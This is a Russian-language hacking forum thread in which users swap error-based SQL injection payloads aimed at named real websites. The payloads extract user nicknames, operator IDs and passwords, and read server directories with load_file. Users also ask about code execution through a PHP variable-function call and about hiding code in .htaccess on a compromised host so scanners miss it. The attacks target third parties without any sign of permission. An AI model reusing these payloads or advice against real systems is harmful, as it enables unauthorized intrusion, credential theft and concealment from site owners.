Code: http://werbevirus.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,(SELECT nickname FROM netzwerk_user LIMIT 0,1)))) а те колонки из вашего запроса - пустые.
спасибо я маленько не так сделала 1 |(ExtractValue(1,concat(0x5c,(SELECT GROUP_CONCAT(CONCAT_WS(0x3a,betreiber_id,betreiber_passwort,betreiber_kennung)) FROM netzwerk_schnittstelle )))) пустые но не все))
даже если так, то можно узнать папки из /home/, однако из /home/user/ или /home/user/***/www/--- нет. другие варианты: брутфорс, раскрытие путей или как вариант, если тебе нужен список сайтов под определенным юзером ищи конфиг апача
Если freebsd, то через пма можно узнать. select load_file('home/user/') покажет все папки в папке user и т.д.
error based в limit Code: num=50,25+PROCEDURE+ANALYSE+(0,(SELECT+3+ORDER+BY+extractvalue(1,concat(0x3A,version()))))--+ 5.5.32
есть уязвимый кусок кода: PHP: $function($param1, $param2); могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку: Code: Fatal error: Call to undefined function phpinfo();exit() Есть какой-нибудь вариант внедрения произвольного кода?
вроде предельно ясно написано, могу передавать произвольное значение. Например: PHP: $function = $_REQUEST['action']; $function($param1, $param2);
http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bview%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpicalendar&tx_cal_controller%5Buid%5D=357&tx_cal_controller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_controller%5Bday%5D=04 Можно чё нить с этим сделать? Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`
Есть активная XSS на одном сайте и я хочу получить от него админку, но фишка вся с хостом. Под хостом имеется ввиду мой шелл на котором уже есть свой файл .htaccess в который нам нужно вставить свой код. .. Так вот вопрос, если я дополнительно вставлю свой код, на работе самого сайта это никак не отразится... сканеры могут обнаружить этот код?!
Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi. Конечно могут.
Это очевидно, что ведёт лог, по всем признакам похоже на иньекцию error base и я уверен что это SQLi! только вот у самого не получилось запрос составить, думал может кому то повезёт...
вы ошибаетесь. ошибка возникает при добавлении в лог. даже если так, то mq = on, а передаваемый URL — str
Да, можно наблюдать, что параметр достаточно экранируется. Ещё можно заметить, что используется драйвер MySQL Improved, а значит, что наиболее вероятно в запрос ни один из параметров непосредственно не попадает. Пациент мертв дважды.
Code: http://infe{GOOGLE INDEX}vents.com/Lightbox{GOOGLE INDEX}Detail.aspx?boxid=229883%27&start=17 ничего не даёт, кроме раскрытия путей, верно?
Добрый день! Кто-нибудь может подсказать как проверить на уязвимость GHOST удаленный сервер, а не собственный?